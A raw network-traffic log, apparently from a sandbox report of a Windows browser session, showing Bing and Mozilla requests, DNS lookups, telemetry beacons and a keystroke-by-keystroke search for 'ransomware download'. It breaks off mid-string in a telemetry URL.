set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221130.1360bdc6
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 2292
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a51d7bb14d918c076ad282305dc1
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:39:09 GMT
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221149.13613d84
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 841
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a51f95cf4f30a5c742fdcab4b092
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:39:11 GMT
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221151.13614fdb
-
Remote address:92.123.128.174:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 990
content-type: application/json; charset=UTF-8
cache-control: no-cache
cookie: MUID=3D5A1FC279D364EE3BB40BF678B46555; _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=BB06430B7C6F40238C65228617B00B35&dmnchg=1; SRCHUSR=DOB=20240229; SRCHHPGUSR=SRCHLANG=en; _SS=SID=2E8457882CFB67FF3C3943BC2D9C6661; MUIDB=3D5A1FC279D364EE3BB40BF678B46555
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 65e0a5202f0d462d94051edee5317a2b
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:39:12 GMT
set-cookie: _EDGE_S=F=1&SID=2E8457882CFB67FF3C3943BC2D9C6661&mkt=en-US; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.ae777b5c.1709221152.13615a83
-
Remote address:8.8.8.8:53Request174.128.123.92.in-addr.arpaIN PTRResponse174.128.123.92.in-addr.arpaIN PTRa92-123-128-174deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request224.37.20.2.in-addr.arpaIN PTRResponse224.37.20.2.in-addr.arpaIN PTRa2-20-37-224deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestcontile.services.mozilla.comIN AResponsecontile.services.mozilla.comIN A34.117.237.239
-
Remote address:8.8.8.8:53Requestcontent-signature-2.cdn.mozilla.netIN AResponsecontent-signature-2.cdn.mozilla.netIN CNAMEcontent-signature-chains.prod.autograph.services.mozaws.netcontent-signature-chains.prod.autograph.services.mozaws.netIN CNAMEprod.content-signature-chains.prod.webservices.mozgcp.netprod.content-signature-chains.prod.webservices.mozgcp.netIN A34.160.144.191
-
Remote address:34.117.237.239:443RequestGET /v1/tiles HTTP/2.0
host: contile.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
-
Remote address:8.8.8.8:53Requestcontile.services.mozilla.comIN AResponsecontile.services.mozilla.comIN A34.117.237.239
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN A34.160.144.191
-
Remote address:8.8.8.8:53Requestcontile.services.mozilla.comIN AAAAResponse
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAAResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAA2600:1901:0:92a9::
-
Remote address:8.8.8.8:53Requestshavar.services.mozilla.comIN AResponseshavar.services.mozilla.comIN CNAMEshavar.prod.mozaws.netshavar.prod.mozaws.netIN A44.239.242.57shavar.prod.mozaws.netIN A44.237.149.213shavar.prod.mozaws.netIN A54.218.225.239
-
Remote address:8.8.8.8:53Requestpush.services.mozilla.comIN AResponsepush.services.mozilla.comIN CNAMEautopush.prod.mozaws.netautopush.prod.mozaws.netIN A34.107.243.93
-
Remote address:8.8.8.8:53Requestautopush.prod.mozaws.netIN AResponseautopush.prod.mozaws.netIN A34.107.243.93
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AResponseshavar.prod.mozaws.netIN A44.237.149.213shavar.prod.mozaws.netIN A44.239.242.57shavar.prod.mozaws.netIN A54.218.225.239
-
Remote address:8.8.8.8:53Requestautopush.prod.mozaws.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestfirefox.settings.services.mozilla.comIN AResponsefirefox.settings.services.mozilla.comIN CNAMEprod.remote-settings.prod.webservices.mozgcp.netprod.remote-settings.prod.webservices.mozgcp.netIN A34.149.100.209
-
Remote address:34.107.243.93:443RequestGET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Uw8wZIYh7HXPCHaRm1xEKw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
ResponseHTTP/1.1 101 Switching Protocols
date: Thu, 29 Feb 2024 15:39:41 GMT
Via: 1.1 google
Upgrade: websocket
Connection: Upgrade
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-USfirefox.exeRemote address:34.149.100.209:443RequestGET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-modified-since: Fri, 25 Mar 2022 17:45:46 GMT
if-none-match: "1648230346554"
te: trailers
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AResponseprod.remote-settings.prod.webservices.mozgcp.netIN A34.149.100.209
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AAAAResponse
-
204.79.197.200:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=tls, http22.0kB 9.2kB 22 18
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=HTTP Response
204 -
147.9kB 626.0kB 656 832
HTTP Request
GET https://www.bing.com/qbox?query=r&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=813597d0fd7c4c83bd93f0f65f70d7f7&oit=1&cp=1&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ra&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d6b3c259745641f5ba46544b324ac9b1&oit=1&cp=2&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b4a68d9f48a94710aa47123c49d0f513&oit=1&cp=3&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2bd19b7e9ff04ddea55d7e4671acbd46&oit=1&cp=4&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fb943bd579fe4dafb2377c59baca13e0&oit=1&cp=5&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=random&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e598abb6362241cab48165f45089cf03&oit=1&cp=6&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3ba87f8c42d447b0b151ecbe8563e4b3&oit=1&cp=5&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=690e6c7ddc2c4184a803f4195978836f&oit=1&cp=4&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=eecd509c0d7347429b7f4d725c56a70b&oit=1&cp=3&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=rans&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dea3b9b26b524edabcbc26e58dd08c7c&oit=1&cp=4&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ranso&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=730eee639ba04f598ba6c2813d1fb3f4&oit=1&cp=5&pgcl=4HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransom&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=cdb5e947a295404abc7b8abdcbb870b1&oit=1&cp=6&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomw&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3431ee381e2d45d49bb4218d53fd2dfd&oit=1&cp=7&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomwa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=59f1f825e4ac4c3ab22333aec1f54529&oit=1&cp=8&pgcl=4HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomwar&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=9afd8ef73a714186bf1277b891c52b3d&oit=1&cp=9&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomware&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fff481f46e6d490d9b251809195119a9&oit=1&cp=10&pgcl=4HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomware+&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e30a68b27d4c4a3b9f92e1fdf1c63b44&oit=1&cp=11&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomware+do&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=ddefcba0c7bb4d0fa9dd7f025ff46e05&oit=4&cp=13&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomware+dow&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b88ef8b4b1614b91a1a1a6c417bfc0aa&oit=4&cp=14&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomware+down&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2688ab1066ec4513984b3c572f0cceab&oit=4&cp=15&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomware+downl&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d1e8b050ebc444f5afda5b1eaf825f13&oit=4&cp=16&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomware+downlo&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dc160efbceae48ff8bab6489e6fe5217&oit=4&cp=17&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=ransomware+downloa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=879b47079efa4c27b2edc8558ec4966a&oit=4&cp=18&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ransomware+download&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=04a982ca0cb44fd49374739a929f08a5&oit=4&cp=19&pgcl=4HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531HTTP Response
200HTTP Request
GET https://www.bing.com/sa/simg/Roboto_Regular.woff2HTTP Request
GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2HTTP Request
GET https://www.bing.com/rp/yzhK9LMK0pK8FBXJDlWpAoFuOfI.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:83,%22BC%22:491,%22SE%22:-1,%22TC%22:-1,%22H%22:623,%22BP%22:625,%22CT%22:626,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01HTTP Request
GET https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.icoHTTP Request
POST https://www.bing.com/fd/ls/lsp.aspx?HTTP Request
GET https://www.bing.com/rp/-7ETfQzBkK_2PbGk8r_3rM8GSu0.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.pngHTTP Response
204HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.45%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706539%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706540%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A696%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A1337%2C%22time%22%3A1339%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220706893%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6HTTP Request
POST https://www.bing.com/rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}]HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/orgid/idtoken/conditionalHTTP Response
200HTTP Request
GET https://www.bing.com/sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable&HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707153%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220707167%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707189%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220707193%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220707225%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220707430%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22CIBInfo%22%2C%22CustomData%22%3A%22%7B%5C%22version%5C%22%3A%5C%221.1600.1%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707851%2C%22Name%22%3A%22CIB%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22